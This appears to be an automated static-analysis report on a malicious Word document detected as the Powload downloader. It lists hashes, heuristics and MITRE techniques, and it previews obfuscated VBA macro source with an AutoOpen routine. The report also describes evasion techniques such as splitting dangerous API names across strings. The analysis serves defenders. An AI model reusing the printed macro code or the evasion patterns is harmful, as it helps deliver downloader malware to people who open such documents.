Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7169323bd6c9ee7c…

MALICIOUS

Office (OLE)

214.8 KB Created: 2019-04-23 08:33:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: e47ce2635410519efc5831dc48def514 SHA-1: 03539c12b6f0ebc8551ca1b858dc2f08ff80daa3 SHA-256: 7169323bd6c9ee7c407e5b654bdbccc85adfead85e80ed65f147f79da7e7004c
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a critical OLE_VBA_WMI_PROCESS_CREATE heuristic firing, indicating the VBA macros attempt to launch a process using WMI. This is further supported by the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION heuristic, which detected obfuscated use of 'Win32_Process'. The presence of an AutoOpen macro and the ClamAV detection of 'Doc.Downloader.Powload-6952856-0' strongly suggest the document's purpose is to download and execute a secondary payload.

Heuristics 9

  • ClamAV: Doc.Downloader.Powload-6952856-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6952856-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54329 bytes
SHA-256: 6a35e6ef83d9248dd6201abbb16baa5b83c8b75f65385bce72f5804c21175058
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GAXA_A"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QkU1AG"
Attribute VB_Base = "0{349A9389-B283-4B6B-9A4D-0D442BA14669}{E1DB5AE8-323B-4945-B82D-EEDD97D3A879}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "U1BBcAGQ"
Attribute VB_Base = "0{B3017B3B-9916-4E75-9168-77EB1B2486D9}{DD493F60-6F84-42EB-96DF-C77227DEA352}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "R4UZkkA"
Sub autoopen()
   If WAGABAo = dUB_BxU Then
     EAxwoAQ = tBUQ4AAk - pxADxQ
       ElseIf zQ11A_ = J_wQCD Then
      Select Case AwAADAB
         Case 721160045
       UAxXxAG = 674456270 * XBAwDQCA / 904527857 * Hex(659311671 * Fix(j_AQCXc / CStr(dZUDAAc_) * NAAAA14C - Fix(553416597)) - 481443483 * Round(H1CCBkw_ + Hex(zxoDQk1Z) / 956402260 - 979263343))
       wAA14_Dw = qAAkAB + MADBAA1D * jAQAUDA / Sqr(OZQkAAA) / 212355120 - Hex(VcAcDAQU) + (415262249 / 825775440)
      End Select
End If
   If ZkkABZA = l_AADCU_ Then
     q1cQ4A = SDXACkw - CwUUQ1
       ElseIf VQCCXA4A = HZ4QAZ Then
      Select Case cGGQCUc
         Case 799525504
       vA1c_G = 172081881 * UAA4AcA / 63015237 * Hex(872421110 * Fix(ZAAkABX / CStr(MCDUUAX) * BADDDA - Fix(224264742)) - 235680572 * Round(bxAkAA + Hex(aAA4Z1) / 748680991 - 168260770))
       wXUAcABA = qZAZAC + fAkwGAU * VAD4A1A1 / Sqr(mAU1Ax4) / 196159970 - Hex(ooQAAB) + (641311083 / 663157798)
      End Select
End If
wAADBAAU
   If u1AADQkZ = SCDGA_c Then
     rCAZAAx = UwXAkAoD - ixCAAB
       ElseIf GwUXw_A = DA41DADD Then
      Select Case ABDQDUB
         Case 576189816
       p_AQZoAA = 206489193 * EAoAB_BA / 961105193 * Hex(571193051 * Fix(KAQQ_AQ / CStr(qAA4oAQ_) * uQ4AA_ - Fix(956799014)) - 787712865 * Round(N_AAAUoA + Hex(lAABAABw) / 688534750 - 663106152))
       HAAQ4cD1 = sDAA_1U + CDxB_AQG * mDAAAAA / Sqr(GoUB1A) / 553679771 - Hex(wAQQZA) + (39106427 / 495410976)
      End Select
End If
   If wBG1A11k = CADACk Then
     TUZQDBAU = lADAQQ - iQAA4AA
       ElseIf lQ4B4A4C = UAAQCAx Then
      Select Case nUkACZ
         Case 540916076
       vQwwkk = 27023781 * WkwQUAD / 282495543 * Hex(695557938 * Fix(wX4owX / CStr(wADA1Bx) * JAUQDA - Fix(576262920)) - 268714811 * Round(kAUGQQDD + Hex(RcAAAA) / 797641035 - 64265720))
       KGkokAAU = B4UX4BA + OC_1AoX * FUxZwAQx / Sqr(dAUA_UAA) / 592170856 - Hex(sDBZQx) + (732964286 / 402924103)
      End Select
End If
End Sub

Attribute VB_Name = "jAABAA_4"
Function wAADBAAU()
On Error Resume Next
   If EDxQAG = OAAA1AA Then
     ZAAoUBX = W44CQDD - CA_GDBB
       ElseIf vDQDD_x = BUUQB_BA Then
      Select Case QACAAB
         Case 587052697
       qQAxAAAC = 826398437 * GAAXAZk / 256753081 * Hex(467068860 * Fix(sAAAZc / CStr(aZQAAD) * m44QAA1 - Fix(917622309)) - 393534227 * Round(FAAAwoUU + Hex(uG1AUB) / 32368722 - 340678060))
       rDkDAo_D = uDUwDXQ + NXGDXBC * B4AB4XAA / Sqr(kDUDcA1) / 554764030 - Hex(hQQoAQ) + (702919249 / 162636512)
      End Select
End If
   If TABUUXU = bAQ1CAA Then
     iBQwkDAD = iwDAAAA - G4kA1G
       ElseIf doZZAc = mcA4ABAA Then
      Select Case SAZ_QAAG
         Case 881986645
       QAQBB4Z = 355497647 * LocBQA / 690273787 * Hex(336209181 * Fix(qAZAoA / CStr(XAQkCDA) * mocBcAA - Fix(133313487)) - 551667202 * Round(m1_AAcAo + Hex(wDZAAQ) / 381956933 - 100126726))
       HAACA4A = sXAwX4Ao + zAQCUQQ_ * wAxAAA / Sqr(aoUQAX) / 920847931 - Hex(u1BAoC1) + (968798970 / 880788876)
      End Select
End If
   If pDQ_BA = wDQAo1Ak Then
     wAkAQxc = ABoAUkG - kwQGAQQA
       
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.